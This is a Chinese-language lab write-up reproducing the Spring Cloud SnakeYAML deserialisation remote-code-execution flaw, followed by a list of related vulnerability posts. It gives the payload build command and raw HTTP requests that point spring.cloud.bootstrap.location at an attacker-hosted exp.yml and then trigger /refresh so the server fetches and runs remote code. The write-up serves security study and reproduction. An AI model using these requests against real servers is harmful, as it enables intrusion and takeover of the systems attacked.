spring cloud SnakeYAML RCE复现
一、漏洞成因:
spring cloud在低版本下的 SnakeYAML 依赖组件存在反序列漏洞
二、漏洞复现
1、漏洞环境:
服务器:127.0.0.1
kali攻击机:192.168.174.130
下载漏洞环境:
SpringBootVulExploit/repository/springcloud-snakeyaml-rce at master · LandGrey/SpringBootVulExploit · GitHub
2、在IEDA中打开下载好的项目(这里注意需要更改自己本地的sdk版本我这里使用的是1.8,语言级别为8)
3、Maven安装一下依赖
4、配置Spring boot
5、这里可以看到项目成功启动成功,在本地访问http://127.0.0.1:9092/env
6、编译java文件,生成jar文件。(详细:https://github.com/artsploit/yaml-payload)
javac src/artsploit/AwesomeScriptEngineFactory.javajar -cvf yaml-payload.jar -C src/ .
7、新建exp.yml文件,将payload编写进去。将打包生成的yaml-payload.jar文件和编写的exp.yml文件拷贝到相同目录下。并使用python开启80端口的web服务。
8、设置 spring.cloud.bootstrap.location 属性
POST /env HTTP/1.1
Host: 127.0.0.1:9092
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 62spring.cloud.bootstrap.location=http://192.168.174.130/exp.yml
9、 refresh 接口刷新spring配置,触发rce
POST /refresh HTTP/1.1
Host: 127.0.0.1:9092
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 010、命令成功执行,服务接收到访问信息
三、参考
https://github.com/LandGrey/SpringBootVulExploitspring cloud SnakeYAML RCE复现相关推荐
- Spring Cloud Gateway rce
Spring Cloud Gateway rce cve-2022-22947 漏洞描述: Spring Cloud Gateway是Spring中的一个API网关.其3.1.0及3.0.6版本(包含 ...
- 漏洞复现----42、Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
文章目录 Spring Cloud Gateway 漏洞版本 漏洞复现 1.IP:端口,抓包修改请求包,构造包含恶意SpEL表达式的路由 2.刷新网关,触发SpEL表达式执行 3.查看SpEL表达式执 ...
- CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞 复现
1 漏洞信息 漏洞名称 Spring Cloud Function SpEL 远程代码执行漏洞 漏洞编号 CVE-2022-22963 危害等级 高危 CVSS评分 7.5 漏洞类型 中间件漏洞 漏洞 ...
- Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现
0x01 漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单.有效.统一的 ...
- Spring Cloud Feign的两种使用姿势
概述 最近结合一些别人的开源项目来学习Spring Cloud,其中关于服务消费这方面的一个很便利的工具 Feign让我记忆颇深.虽然网上的Demo和例子不胜枚举,但大多比较分散,本文就来集中记录一下 ...
- Spring Cloud中Hystrix 线程隔离导致ThreadLocal数据丢失(续)
前言 上篇文章<Spring Cloud中Hystrix 线程隔离导致ThreadLocal数据丢失>我们对ThreadLocal数据丢失进行了详细的分析,并通过代码的方式复现了这个问题. ...
- Spring Cloud中Hystrix 线程隔离导致ThreadLocal数据丢失
在Spring Cloud中我们用Hystrix来实现断路器,Zuul中默认是用信号量(Hystrix默认是线程)来进行隔离的,我们可以通过配置使用线程方式隔离. 在使用线程隔离的时候,有个问题是必须 ...
- RedMonk最新编程语言排行榜;Spring 框架现 RCE 漏洞……|叨资讯
点击关注强哥,查看更多精彩文章呀 哈喽,大家好,我是强哥. Spring 框架现 RCE 漏洞:按月租用iPhone手机.随时能换新款:俄罗斯或将转用 HarmonyOS:Chrome 100发布:R ...
- Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)
引言 Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单.有效.统一的API路由管理方式. ...
- Spring Boot集成ShardingSphere分片利器 AutoTable (二)—— 自动分片算法示例 | Spring Cloud 46
一.前言 在前面我们通过以下章节对ShardingSphere的AutoTable 有了基础的了解: Spring Boot集成ShardingSphere分片利器 AutoTable (一)-- 简 ...
最新文章
- python棋盘放米循环结构_Python递归法计算棋盘上所有路径总奖品最大值(京东2016编程题)...
- SQL Server查询重复数据
- python代码示例图形-使用Python统计函数绘制复杂图形matplotlib
- [easyui] 在iframe中操作父窗口的组件
- SAP CRM One Order 根据联系人姓名搜索的实现原理
- easyexcel 无模板写入_关于EasyExcel 的一些生成模板,导入导出的使用心得(优化版)...
- t3s java_关于JAVA的this关键字
- nodejs入门_如何在NodeJS中使用套接字创建专业的Chat API解决方案[入门级]
- windows linux cpu 抢占式 时间片_阿里技术专家谈:CPU飙高,系统性能问题如何排查?...
- shell学习脚本-tomcat停止脚本
- linux mysql导出乱码问题_[MYSQL]将数据从5.0版本导入到4.1.7版本中出现乱码问题解决方案...
- 网站安全系列:跨站脚本攻击XSS
- upc组队赛5 Election of Evil【搜索】
- Struts2不扫描jar包中的action
- python aiml_Python:用aiml构建英语聊天机器人
- 施工日志管理软件app_庄典iPad建筑装修报表管理系统施工报表制作流程
- fgo最新服务器,《FGO》:现在世界上其他地区的服务器近况如何,一起来看看吧!...
- 车轱辘APP提交到各应用市场的心得~
- Direct3D初始化失败的原因
- af dns 刷新时间_第一时间上手Redmi K30 Pro,有些想法不吐不快